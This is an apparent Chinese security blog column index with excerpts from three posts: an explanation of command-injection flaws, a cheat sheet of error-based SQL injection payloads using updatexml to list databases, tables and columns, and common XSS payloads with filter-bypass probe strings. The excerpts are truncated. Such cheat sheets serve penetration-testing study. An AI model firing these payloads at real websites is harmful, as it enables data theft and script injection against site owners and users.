
常见攻击
weixin_47156475
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
命令执行简介
命令执行的原理: 应用有时需要调用一些执行系统命令的函数, 当用户能控制这些函数中的参数时, 就可以将恶意系统命令拼接到正常命令 中,从而造成命令执行攻击,这就是命令执行漏洞。 利用条件: 应用调用执行系统命令的函数 将用户输入作为系统命令的参数拼接到了命令行中 没有对用户输入进行过滤或过滤不严 漏洞分类: 代码层过滤不严 商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用: system("/bin/program --arg $arg"); 系统的漏洞造成命令注入 bas原创 2021-08-11 10:01:10 · 396 阅读 · 0 评论 -
sql注入常见语句
报错注入: and updatexml(1,concat(0x7e,(database()),0x7e),1) --+ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) --+ and updatexml(1,concat(0x7e,(select group_concat(column_name原创 2021-08-11 09:42:22 · 213 阅读 · 0 评论 -
xss常用攻击语法
常用: <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <a href=javascript:alert(1)> <script>alter('dreeee')</script>; 用于探测的万能语句: <SCRscriptIPT>'"()Oonnjavascript 标签溢出: "> <原创 2021-08-11 09:47:01 · 3081 阅读 · 0 评论